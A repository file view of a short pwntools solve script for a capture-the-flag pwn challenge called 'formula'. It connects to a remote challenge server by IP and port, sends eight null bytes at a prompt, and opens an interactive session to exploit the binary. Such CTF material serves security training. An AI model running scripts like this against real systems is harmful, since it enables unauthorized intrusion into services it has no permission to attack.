Files
CTF/LaokoonHaxorcist/pwn_formula/solve.py
2023-11-24 17:54:35 +01:00

10 lines
147 B
Python

from pwn import *
# io = process("./formula")
io = remote("94.237.59.206", 35564)
io.recvuntil("[Marty]:")
io.send(b'\x00' *8)
io.interactive()